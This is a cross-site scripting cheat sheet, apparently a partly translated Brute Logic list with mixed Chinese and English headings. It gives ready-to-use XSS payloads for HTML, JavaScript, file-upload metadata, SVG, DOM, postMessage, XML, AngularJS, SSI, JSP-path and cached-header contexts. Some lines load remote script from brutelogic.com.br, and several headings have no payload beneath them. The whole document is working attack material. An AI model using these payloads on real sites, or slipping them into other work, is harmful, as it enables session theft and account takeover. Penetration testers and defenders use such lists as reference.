XSS Cheat Sheet


  • HTML注入
<svg onload=alert(1)>
"><svg onload=alert(1)>
  • HTML注入-标签块突破

​ 当输入落在以下标签的内部或打开/关闭之间时使用:


</tag><svg onload=alert(1)>
"></tag><svg onload=alert(1)>
  • HTML注入-内联

​ 当输入落在HTML标记的属性值内,但该标记不能以大于号(>)结束时使用

"onmouseover=alert(1) //
"autofocus onfocus=alert(1) //
  • HTML注入-源文件

​ 当输入作为下列HTML标记属性的值:href、src、data或action(也包括formaction)时使用。脚本标记中的Src属性可以是URL或“data:,alert(1)”。

  • Javascript注入


  • Javascript Injection - Escape Bypass


  • Javascript Injection – Script Breakout
</script><svg onload=alert(1)>


  • Javascript Injection - Logical Block


  • Javascript Injection - Quoteless

​ 使用时,有多个反射在同一行JS代码

  • Javascript上下文——模板文字中的占位符注入

当输入位于用反号(' ')分隔的字符串内或在模板引擎中时使用

  • 多反射HTML注入-双反射(单输入)


  • 多反射HTML注入-三反射(单输入)
  • Multi Input Reflections HTML Injection - Double & Triple(多次输入)
p=<svg 1='&q='onload='/*&r=*/alert(1)'>
  • File Upload Injection – Filename


"><svg onload=alert(1)>.gif
  • File Upload Injection – Metadata

Use when metadata of uploaded file is reflected somewhere in target page. It uses
command-line exiftool (“$” is the terminal prompt) and any metadata field can be set.


$ exiftool -Artist='"><svg onload=alert(1)>' xss.jpeg
  • File Upload Injection – SVG File


<svg xmlns="http://www.w3.org/2000/svg" onload="alert(1)"/>
  • DOM Insert Injection
<img src=1 onerror=alert(1)>
<iframe src=javascript:alert(1)>
<details open ontoggle=alert(1)>
<svg><svg onload=alert(1)>
  • DOM Insert Injection – Resource Request


data:text/html,<img src=1 onerror=alert(1)>
data:text/html,<iframe src=javascript:alert(1)>
  • PHP Self URL Injection


https://brutelogic.com.br/xss.php/"><svg onload=alert(1)>?a=reader
  • Markdown Vector

用于文本框、注释部分等允许某些标记输入的地方。 Click to fire.


  • Script Injection - No Closing Tag

Use when there’s a closing script tag (</script>) somewhere in the code after reflection.

<script src=data:,alert(1)>
<script src=//brutelogic.com.br/1.js>
  • Javascript postMessage() DOM Injection (with Iframe)

Use when there’s a “message” event listener like in “window.addEventListener(‘message’, ...)”
in javascript code without a check for origin. Target must be able to be framed (X-Frame
Options header according to context). Save as HTML file (or using data:text/html) providing
TARGET_URL and INJECTION (a XSS vector or payload).

<iframe src=TARGET_URL onload="frames[0].postMessage('INJECTION','*')">
  • XML-Based XSS

Use to inject XSS vector in a XML page (content types text/xml or application/xml).
Prepend a “-->” to payload if input lands in a comment section or “]]>” if input lands in a
CDATA section.

<x:script xmlns:x="http://www.w3.org/1999/xhtml">alert(1)</x:script>
<x:script xmlns:x="http://www.w3.org/1999/xhtml" src="//brutelogic.com.br/1.js"/>
  • AngularJS Injections (v1.6 and up)

Use when there’s an AngularJS library loaded in page, inside an HTML block with ng-app
directive (1 st payload) or creating your own (2 nd one).

<x ng-app>{{$new.constructor('alert(1)')()}}
  • Onscroll Universal Vector Onscroll通用矢量


It works with
address, blockquote, body, center, dir, div, dl, dt, form, li, menu, ol, p, pre, ul, and h1 to h6
HTML tags.

<p style=overflow:auto;font-size:999px onscroll=alert(1)>AAA<x/id=y></p>#y
  • Type Juggling

    Use to pass an “if” condition matching a number in loose comparisons.

1<svg onload=alert(1)>
1"><svg onload=alert(1)>
  • XSS in SSI
    Use when there’s a Server-Side Include (SSI) injection.
<<!--%23set var="x" value="svg onload=alert(1)"--><!--%23echo var="x"-->>
  • SQLi Error-Based XSS


'1<svg onload=alert(1)>
<svg onload=alert(1)>\
  • Injection in JSP Path

Use in JSP-based applications in the path of URL.

//DOMAIN/PATH/;<svg onload=alert(1)>
//DOMAIN/PATH/;"><svg onload=alert(1)>
  • JS Injection - ReferenceError Fix


(Use to fix the syntax of some hanging javascript code. Check console tab in Browser
Developer Tools (F12) for the respective ReferenceError and replace var and function
names accordingly.)

';alert(1);var myObj='
';alert(1);function myFunc(){}'
  • Bootstrap Vector (up to v3.4.0)

Use when there’s a bootstrap library present on page. It also bypass Webkit Auditor, just
click anywhere in page to trigger. Any char of href value can be HTML encoded do bypass

<html data-toggle=tab href="<img src=x onerror=alert(1)>">
  • Browser Notification


  • XSS in HTTP Header - Cached

Use to store a XSS vector in application by using the MISS-MISS-HIT cache scheme (if
there’s one in place). Replace with your respective vector and TARGET with a dummy
string to avoid the actual cached version of the page. Fire the same request 3 times.

$ curl -H "Vulnerable_Header: <XSS>" TARGET/?dummy_string
